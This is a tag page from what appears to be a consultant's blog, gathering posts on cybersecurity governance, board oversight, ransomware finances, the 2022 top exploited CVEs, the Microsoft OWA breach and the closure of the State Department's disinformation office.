Paul Bergman

Tag: cybersecurity

  • Disinformation Unchecked: How Musk and the New Administration Are Already Shaping the Narrative

    Disinformation Unchecked: How Musk and the New Administration Are Already Shaping the Narrative

    The recent closure of the State Department’s Global Engagement Center (GEC) raises significant concerns about the future of U.S. efforts to combat foreign disinformation. Established in 2016, the GEC was pivotal in identifying and countering propaganda from adversarial nations like Russia and China. Its dissolution, following Congress’s decision to cut funding in the National Defense Authorization Act, leaves a critical gap in the nation’s defense against malign information campaigns.

    Critics argue that this move aligns with the incoming administration’s broader agenda to reshape the narrative landscape. Elon Musk, a prominent adviser to President-elect Donald Trump, has previously labeled the GEC as “the worst offender in U.S. government censorship [and] media manipulation. Musk’s influence, coupled with the administration’s intent to reduce government spending, suggests a deliberate shift away from institutional checks on disinformation.

    This development is particularly troubling given the escalating disinformation efforts by foreign actors. In 2024 alone, countries like Russia and China have intensified propaganda campaigns targeting democratic processes in nations such as Taiwan, Moldova, and Georgia. The absence of a dedicated U.S. entity to counter these threats not only undermines global democratic resilience but also signals a potential acquiescence to foreign influence operations.

    Moreover, the closure of the GEC may embolden domestic actors seeking to control narratives without accountability. The intertwining of political interests with media platforms, exemplified by Musk’s dual roles as a tech mogul and government adviser, raises ethical questions about the impartiality of information dissemination. Without transparent mechanisms to counter disinformation, the public remains vulnerable to manipulated narratives that serve specific agendas.

    The termination of the Global Engagement Center represents a significant step back in the fight against disinformation and leaves those in control of media even more powerful. It reflects an unsettling convergence of political and corporate interests aiming to control narratives, potentially at the expense of truth and democratic integrity. As foreign disinformation campaigns continue unabated, the need for robust countermeasures has never been more critical.

    The GEC had ambitious plans to develop advanced technological tools, including:

    • Photoshopped image detection systems
    • Meme detection models
    • AI-generated content detection tools

    Mark Montgomery, a supporter of the center, expressed frustration with the decision, highlighting the ongoing threat of information operations by countries like Russia, China, and Iran.

    Read more here: State Department’s disinformation office to close after funding nixed in NDAA | CyberScoop

  • Will the courts (finally) step in on AI?

    Will the courts (finally) step in on AI?

    The New York Times vs. OpenAI and Microsoft

    In a groundbreaking legal confrontation, the New York Times has recently filed a copyright infringement lawsuit against OpenAI, the creators of ChatGPT, and Microsoft, a partial owner of OpenAI. This lawsuit delves into the complex and arguably unprecedented issues of copyright law in the age of artificial intelligence. As technology rapidly evolves, so too does the landscape of legal challenges. In his latest post, my friend David Lizerbram explores the intricate details of this case, examining the implications of AI’s use of copyrighted materials without permission and the potential defenses available. Join him as he navigates through the legal intricacies and the broader implications for copyright law in the digital age at New York Times v. OpenAI and Microsoft Copyright Case – David Lizerbram & Associates (lizerbramlaw.com)

    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • 2022 Top Routinely Exploited Vulnerabilities

    Hello, fellow tech enthusiasts and cybersecurity-conscious readers! In the ever-evolving landscape of cybersecurity, staying ahead of potential threats is essential. Every year, new vulnerabilities are discovered, and cybercriminals work tirelessly to exploit them. In 2022, some vulnerabilities took center stage as they were routinely targeted by malicious actors. As we embark on a journey into the fascinating world of cybersecurity, we’ll explore the top routinely exploited vulnerabilities that dominated headlines in 2022. So, grab your favorite beverage, get comfy, and let’s dive into the captivating world of cybersecurity!

    1. Log4Shell (CVE-2021-44228)

    Kicking off our list is the notorious Log4Shell vulnerability. While it first came to light at the end of 2021, its impact rippled into 2022. It affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. This request will allow the attackers to gain control over applications. Thanks to the cybersecurity community’s swift response, patches were released, but it serves as a reminder of the importance of regular updates and monitoring. 

    2. CVE- 2018-13379 

    This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2022 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.

    3. ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

    These vulnerabilities known as ProxyShell, affect Microsoft Exchange email servers. ProxyShell was another major vulnerability that made headlines in 2022. It consisted of three separate vulnerabilities in Microsoft Exchange Server, enabling attackers to gain unauthorized access to email servers. Regularly applying security updates from Microsoft is essential to protect your organization from ProxyShell attacks.

    4. CVE-2021-40539

    This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.

    5. CVE-2021-26084

    It is an object-graph navigation language (OGNL) injection vulnerability that could allow an unauthenticated threat actor to execute arbitrary code on a Confluence Server or Data Center instance.

    6. CVE-2022-22954, CVE-2022-22960

    These vulnerabilities are RCE, privilege escalation, and authentication bypass vulnerabilities in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.

    7. CVE-2022-1388

    This is a vulnerability in F5 BIG-IP that could allow unauthenticated threat actors to execute arbitrary system commands, create or delete files, or disable services.

    8. CVE-2022-30190

    This is a remote code execution vulnerability affecting Microsoft Windows Support Diagnostic Tool (MSDT) that could allow a remote, unauthenticated threat actor to take control of the system.

    9. CVE-2022-26134

    This is a remote code execution vulnerability in Atlassian Confluence Data Center and Server. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

    Additional “popular” vulnerabilities

    Among the other often exploited vulnerabilities listed, there are bugs in solutions by Citrix (CVE-2019-19781), Microsoft (CVE-2017-0199), CVE-2017-11882, CVE-2020-1472, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, CVE-2022-41082, Ivanti (CVE-2019-11510), SonicWALL (CVE-2021-20021, CVE-2021-20038), Fortinet (CVE-2022-42475, CVE-2022-40684), QNAP (CVE-2022-27593), and other software manufacturers.

    Some of the vulnerabilities in these lists date back to 2017 and 2018 and are still being widely exploited.

    Staying informed about the top routinely exploited vulnerabilities is a fundamental aspect of cybersecurity. By understanding these threats and taking proactive measures, you can protect your systems and data from malicious actors. 

    REMEMBER TO:

    • Keep all software and libraries up to date.
    • Turn on Multi Factor Authentication or Two Factor Authentication.
    • Regularly monitor your systems for suspicious activity.
    • Develop an incident response plan to mitigate potential threats.
    • Use strong passwords and VPN
    • Invest in cybersecurity software
    • Think before you click on links that look a little off.
    • Be aware of common attack methods.

    Cybersecurity is an ongoing process, and by staying vigilant and informed, you can reduce the risk of falling victim to the latest vulnerabilities and attacks in 2022 and beyond. Let’s take this knowledge and use it to build a safer digital world for all of us. Cheers to a more secure and resilient cyber landscape in 2023 and beyond! Stay secure, stay informed!

    References:

    2022 Top Routinely Exploited Vulnerabilities | CISA

    CISA, NSA, FBI, and International Partners Release Joint CSA on Top Routinely Exploited Vulnerabilities of 2022  | CISA

    AA23-215A: 2022’s Top Routinely Exploited Vulnerabilities – Blog | Tenable®

    How to Protect Yourself from Software Vulnerabilities – Blog | Tenable®

    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • Microsoft OWA breach

    Today, we’re diving into a topic that has been making headlines recently. It’s all about the Microsoft Outlook Web App (OWA) breach. I understand that hearing about data breaches can be unsettling, but it’s essential to stay informed and take proactive steps to protect yourself and your information. In this blog post, we’ll break down the Microsoft OWA breach, we’ll talk about what happened, what you can do to protect yourself, and why staying informed is crucial in the digital age. Let’s dive in!

    Understanding The Microsoft OWA breach

    So, what exactly happened? Microsoft’s Outlook Web App (OWA) suffered a security breach that had many users concerned about the safety of their emails, attachments, and personal information. The breach occurred due to a vulnerability that allowed  unauthorized access to OWA accounts. And then recently, Microsoft finally explains the cause of the Azure breach. It stated that the corporate account of one of its engineers was hacked by a highly skilled threat actor that acquired a signing key used to hack dozens Azure and Exchange accounts belonging to high-profile users. 

    It’s important to note that not every OWA user was affected, but it’s still crucial to take precautions. Microsoft acted swiftly to address the breach and initiated an investigation. They also took measures to secure the affected OWA servers and notified customers whose data may have been compromised. In addition, they recommended that users change their passwords as a precaution.

    How to Protect Yourself

    1. Change Your Password – If you are using OWA or any other Microsoft services, change your password immediately. Make sure that your password is strong and unique that includes a combination of letters, numbers, and special characters. 
    2. Timely Action – Microsoft acted swiftly to patch the vulnerability and address the breach. If you’re using OWA, make sure that your software is updated to the latest version to ensure that you’re protected. 
    3. Enable Multi-Factor Authentication (MFA) – If you haven’t already, enable MFA to your OWA account. This can add an extra layer of security by requiring you to verify your identity through a second method, like a code sent to your phone.
    4. Beware of Phishing Attempts – Stay vigilant against phishing emails or suspicious messages. Cybercriminals often take advantage of these situations to trick users into revealing sensitive information. 
    5. Monitor Your Accounts – Regularly check your email and financial accounts for any unusual activities. If you notice something suspicious, report it immediately.
    6. Stay Informed – And last but not the least, keep up to date with news and updates from Microsoft regarding the breach. They may release additional information or security recommendations. 

    The Microsoft OWA breach may have raised some concerns, but always remember that being aware and taking proactive measures are your best allies in the digital world. By keeping your software updated, using strong passwords, enabling MFA, and staying vigilant, you can reduce the risks associated with such incidents. 

    Don’t let this breach discourage you from using technology – it’s an integral part of our lives.

    Instead, let it serve as a reminder to be proactive and informed about cybersecurity. Together, we can make the digital world a safer place for everyone. Stay safe, stay informed, and keep your digital world secure!

    References:

    https://arstechnica.com/security/2023/09/hack-of-a-microsoft-corporate-account-led-to-azure-breach-by-chinese-hackers/

    Outlook Hack: Microsoft Reveals How a Crash Dump Led to a Major Security Breach (thehackernews.com)

    iTWire – Microsoft says Azure breach ‘probably’ due to account being cracked

    How To Prevent A Data Breach In Your Company (forbes.com)

    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • How a CISO needs to present to the board

    How a CISO needs to present to the board

    As a Chief Information Security Officer (CISO), reporting to the corporate board can be both an opportunity and a challenge. On one hand, it’s an opportunity to educate the board on the current state of the company’s security posture, demonstrate the value of security investments, and gain support for future initiatives. On the other hand, it’s a challenge because the board may not be well-versed in technical security concepts, making it difficult to communicate effectively.

    Paul Bergman, CISO
    Chief Information Security Officer

    In order to successfully report to the corporate board, a CISO must approach the task with a clear understanding of the board’s expectations and a well-crafted communication strategy. Here are a few key steps to help you do just that:

    Understand the board’s priorities

    Understand the board’s priorities: Before you present to the board, take the time to understand their priorities and what they are most concerned about. This will help you tailor your presentation to their specific needs and ensure that the information you provide is relevant and valuable.

    Use clear, concise language

    The board is likely to include individuals who are not technically savvy, so it’s important to use clear, concise language that is easy for everyone to understand. Avoid using technical jargon or acronyms, and instead focus on the key security issues that are most relevant to the company’s operations and reputation.

    Emphasize the impact of security risks

    The board needs to understand the impact of security risks on the company’s bottom line. Highlight the potential financial and reputational damage that can result from a security breach, and make sure to demonstrate the value of investments in security technologies and processes.

    Paul Bergman, board member

    Provide regular, comprehensive updates

    The board should receive regular, comprehensive updates on the state of the company’s security posture. These updates should include information on the most significant security risks facing the company, as well as the measures that have been taken to mitigate those risks.

    Encourage open communication

    Encourage open communication with the board, and be prepared to answer any questions they may have. This will help to build trust and ensure that everyone is on the same page when it comes to security issues.

    Be proactive

    A good CISO is always looking ahead to identify potential security risks and developing strategies to mitigate them. Share your vision for the future with the board, and outline the steps that you are taking to stay ahead of the curve.

    In conclusion, reporting to the corporate board as a CISO is an important responsibility, and requires a well-thought-out communication strategy. By understanding the board’s priorities, using clear language, emphasizing the impact of security risks, providing regular updates, encouraging open communication, and being proactive, you can build a strong relationship with the board and help ensure the success of your company’s security efforts.

  • Are you 100% certain that you are on top of security basics?

    Are you 100% certain that you are on top of security basics?

    At the siberX CISO Forum Canada, C. Kelley Bissel, CVP of Microsoft Security reported that CISOs are failing to do the basics. He puts a fair amount of blame for these failures on the company CISO.

    “Ninety-eight per cent of attacks are elementary and take advantage of unpatched devices, a lack of multifactor authentication to protect logins, no privileged access controls, no identity management, and password vulnerabilities.”

    C. Kelley Bissel, CVP, Microsoft Security

    First, it’s not all on the CISO

    A strong argument could be made that a CISO in a non-security centric organization is set up to fail. A CISOs job is difficult even with the full backing of leadership. Consider implementing MFA alone: Many executives will push back on the implementation because it isn’t easy.

    Another point of pushback is access control. I first felt this pushback when I was implementing SOX controls and logging on physical access to the company servers on the CIO. The CIO was extremely bothered having to log his access and tried to kill the process as being inefficient. The fact is, he didn’t need access 99.96% of the time anyway. He nearly killed the process which would have led to a possible security exception in an audit. Not a failure of the CISO but a failure of the organization to allow the necessary security.

    So what are ‘security basics’?

    Mr. Bissel outlines the basics as patching, login protection, access control, identity management, and password strength. Certainly, he was simplifying it for presentation but CIS offers a more comprehensive list that includes 56 “Basics” from 18 different controls in Version 8 of the CIS Critical Security Controls.

    security basics

    See other blog posts for more information on putting in basic cybersecurity.

    Consider looking into vCISO service providers. Tracc Development (site sponsor) or any number of service organizations would be happy to help. Omni Group Consulting and Triden Group have excellent talent.

  • Compliance on the horizon? Understand your terms now!

    Compliance on the horizon? Understand your terms now!

    I recently worked on a compliance readiness project to get a company ready for an ISO 27002 audit. I was amazed at how little the organization understood about governance. They were having problems with other compliance as well, even though they were a SOX compliance entity. Yes, they had pretty written “policies” but these were clearly designed by the marketing team, had no structure, and included standards, guidelines, procedures, and even documented the people assigned to do it all.

    ISACA defines internal controls as the policies, procedures, practices and organizational structures designed to provide reasonable assurance that business objectives will be achieved and undesired events will be prevented or detected and corrected.

    ISACA COBIT 5 Framework

    Doing it wrong is even worse than not doing it at all!

    Poorly-scoped documentation often results in governance functions becoming more of a hindrance than a help. An example of inadequate governance documentation is a multi-page policy document that mixes high-level security concepts, configuration requirements, and work assignments. This type of documentation can cause confusion and inefficiencies across technology, cybersecurity, and privacy operations. There are several reasons why this type of documentation is bad, including the fact that it is confusing and people are unlikely to read it, which defeats the purpose of having it in the first place. Additionally, excessively-wordy documentation that explains concepts in great detail can make it difficult to understand exact requirements. If compliance (or certification) is a goal this can lead to gaps, which goes against the goal of being audit-ready.

    Start with the goal in mind

    First, start of with the requirements. If the goal is a certification or compliance, your governance should align to the requirements. If you are already compliant with a framework, find a crosswalk, or mapping, from your framework into the desired framework. This can help focus your efforts and help build a plan for what needs to be done.

    For many technologists, words matter. Terms like “policies” and “procedures” are often used interchangeably but they are not. These terms have quite different implications and those differences should be kept in mind, since the use of improper terminology has cascading effects.

    Also keep in mind that an audit will confirm that policies are being enforced. This means that if a policy says “Bob will update the SSL keys”, what happens if Bob retires? The policy will need to be rewritten! That’s undue work AND it is very likely that it will be forgotten. Another common mistake is to be too specific with tools, such as stating “All servers are to be running Windows Server 2008.” Obviously these policies will not age well. While all policies should be reviewed regularly, little mistakes like these can be overlooked.

    Source: http://www.commoncontrolsframework.com/

    Doing it right

    In the realm of cybersecurity documentation, a strong governance structure is built on a hierarchy of components that work together in an integrated approach to managing requirements. Keep these components distinct and don’t try to address everything in one document! These components include:

    Policy: A high-level statement of management intent that formally establishes requirements to guide decisions and achieve rational outcomes. Policies are enforced by standards and further implemented by procedures, and are often created in response to external influences like statutory, regulatory, or contractual obligations.

    Control Objectives: Targets or desired conditions that are designed to ensure policy intent is met. Control objectives help to establish the necessary scope to address a policy and should be directly linked to an industry-recognized practice, such as statutory, regulatory, or contractual requirements.

    Standard: Formally-established requirements related to processes, actions, and configurations that are finite and quantifiable. Standards satisfy control objectives and exceptions are never made to policies, only to standards. If a standard cannot be met, a compensating control should be implemented to mitigate risk.

    Guidelines: Recommended practices that allow for discretion or leeway in interpretation, implementation, or use. Guidelines are based on industry-recognized practices or cultural norms within an organization and augment standards when discretion is permissible.

    Procedure: A formal method of doing something based on a series of actions conducted in a certain order or manner. Procedures are the responsibility of the asset custodian to build and maintain, in support of standards and policies.

    Together, these components create a comprehensive and effective governance structure for managing cybersecurity requirements.

    For more information on governance and cyber security, check out other articles here.

  • What happens to ransomware money?

    What happens to ransomware money?

    Ransomware is a type of malicious software that encrypts a victim’s files. The attackers then demand payment in exchange for the decryption key, typically in the form of cryptocurrency, like Bitcoin, because it is easier to make the exchange anonymous. In recent years, ransomware attacks have become an increasingly common form of cybercrime, and the attackers behind them have been able to generate significant amounts of money. But what happens to all of that ransom money? Where does it go and how is it used?

    The vast majority of ransomware payments make their way to Eastern Europe and the former Soviet Union. These regions have become hub for cybercrime due to the high level of technical expertise and the relative ease with which criminal operations can be conducted.  This begs the question about how closely these criminal organizations are to nation states. While Western governments are careful about blaming other nations for such attacks, it is clear that interests are aligned. Western states have noticed an increase in cybercrime activities against them for their support of Ukraine over the last year, clearly an indication of a link in ideologies at the least.  It should be noted that North Korea is also even more clearly in the cybercrime game and uses funds from ransomware payments to directly finance the regime.

    Once the ransom money has been converted into more liquid forms (local currency), it can be used for a variety of purposes. Some of the ransom money is used to fund the attacker’s lifestyle, including expensive cars, luxury vacations, and high-end real estate. Other money is invested in other criminal operations or laundered through various financial institutions to make it appear as legitimate income.

    While Hollywood likes to portray “hackers” as reserved types in hoodies sitting alone in a dark room, ransomware attacks are often carried out by organized crime syndicates. These organizations are extremely well connected and organized as well as any Fortune 500 company. As with any corporation, part of revenue goes back into product development funding development and distribution of new malware, the creation of botnets, and the purchase of stolen data on the dark web. This money can also be used to bribe law enforcement or government officials, allowing the attackers to operate with impunity.

    Mr. Robot

    The flow of ransomware money is complex and multifaceted, and it is difficult to determine exactly where it all goes. Some of it is used to fund the attackers’ lifestyles, while some is invested into developing new and more complex attacks.  Some attacks may directly or indirectly prop up nations.

    If hit with ransomware, each company and individual must evaluate the cost rebuilding their systems and data against paying the ransom. However, that is a simplistic view of the equation. With the rise of corporate social responsibility, paying a ransom to restore services must consider what the ransom proceeds may support.

  • Why boards need to be paying attention to cybersecurity now

    Why boards need to be paying attention to cybersecurity now

    Contrary to popular belief, cybersecurity is not an operations issue! Cybersecurity is frightening and board love to disassociate by saying it is “operational” and thus not their responsibility. However, it is a critical issue for the whole organization and the legal requirements for corporate boards to pay attention to this issue are growing. With increasing numbers of data breaches and cyber-attacks, the legal landscape is rapidly evolving to protect both organizations and their customers from the consequences of these events. Here are a few key legal requirements that corporate boards should be aware of when it comes to cybersecurity:

    • Data protection laws: Many countries have enacted data protection laws, such as the European Union’s General Data Protection Regulation (GDPR), that require organizations to take appropriate measures to protect the personal data of their customers and employees. This includes implementing technical and organizational measures to prevent unauthorized access to personal data, and ensuring that the company has a process in place for responding to data breaches.
    • Cybersecurity regulations: Some industries, such as finance and healthcare, have specific cybersecurity regulations that companies must abide by. These regulations can include requirements for regular risk assessments, incident response plans, and the implementation of security technologies.
    • Contractual obligations: Companies often have contractual obligations to their customers and partners to protect the data they are entrusted with. Failing to meet these obligations can result in financial and reputational damage, and may even lead to legal liability.
    • Corporate governance laws: In many countries, corporate boards have a fiduciary duty to ensure that the company is managed in the best interests of its shareholders. This includes taking steps to protect the company’s assets and data from cyber threats.
    • Tort law: Companies can also face legal liability under tort law if they fail to take reasonable steps to protect their customers’ data. This can include negligence, breach of contract, and misrepresentation claims.

    Corporate boards must be aware of the growing legal requirements around cybersecurity. Failure to meet these requirements can result in legal liability, financial losses, and reputational damage. By staying informed about the latest laws and regulations, conducting regular risk assessments, and implementing appropriate security measures, corporate boards can help ensure that their organizations are protected from cyber threats and meet their legal obligations. I outlined a number or items a board should be doing in my post on corporate boards: The role of the corporate board in cybersecurity – Paul Bergman

  • The role of the corporate board in cybersecurity

    The role of the corporate board in cybersecurity

    The corporate board bears a crucial responsibility for managing cybersecurity risks that threaten organizations of all sizes. As overseers of the company’s cybersecurity posture, board members must take active steps to protect its assets and data from cyber threats. However, some board members may not fully understand their personal liability for lack of oversight in this area.

    Under corporate governance laws, board members have a fiduciary duty to act in the best interests of the shareholders and protect the company from cyber threats. If a board member fails in this duty, they may face personal liability for any resulting losses or damages. According to the landmark 1996 ruling in Caremark, directors can be held accountable if they fail to properly monitor and oversee the company or if their inaction results in a loss. Furthermore, if the company breaches data protection laws, such as the EU’s GDPR, board members may be accountable.

    A framework for addressing cybersecurity risk.

    To effectively mitigate cybersecurity risk, the corporate board should take the following steps:

    1. Stay informed: Invite the CISO or vCISO to present updates, but don’t rely solely on these presentations. Have a board member with technical expertise stay current with industry news, attend security conferences and events, and engage with security experts.
    2. Assess risk posture: Conduct a comprehensive risk assessment to identify areas of weakness and potential vulnerabilities.
    3. Develop a cybersecurity strategy: Based on the results of the risk assessment, outline steps to mitigate risk and protect against cyber threats, including the implementation of technologies, processes, and training programs.
    4. Allocate resources: Ensure the organization has adequate funding and staffing to implement and maintain its security posture.
    5. Foster a culture of security: Encourage security awareness and training throughout the organization and incorporate security into company policies and procedures.
    6. Insure a true representation of risks: Consider forming a cybersecurity committee working directly with the CISO to ensure a clearer understanding of risks, as executive management may suppress or under-appreciate cybersecurity risks.
    7. Engage with third-party vendors: Partner with a security vendor to supplement internal security efforts and stay updated on the latest security technologies and best practices.
    8. Monitor and review regularly: Establish regular review processes to ensure the organization’s cybersecurity posture remains effective, including reporting from the CISO on threats and regular reviews of security policies, incident response plans, and metrics.

    Clearly, the corporate board has a critical role to play in mitigating cybersecurity risk. By staying informed, assessing the organization’s risk posture, developing a comprehensive cybersecurity strategy, allocating adequate resources, fostering a culture of security, engaging with a third-party vendor, and monitoring and reviewing regularly, the board can help ensure that the company is taking the necessary steps to protect itself against cyber threats.

    Manager is pushing DEFINE YOUR ENTERPRISE SECURITY POLICY on a visual interactive display. Business challenge metaphor and information technology concept for cybersecurity standards and planning.

    More on Cybersecurity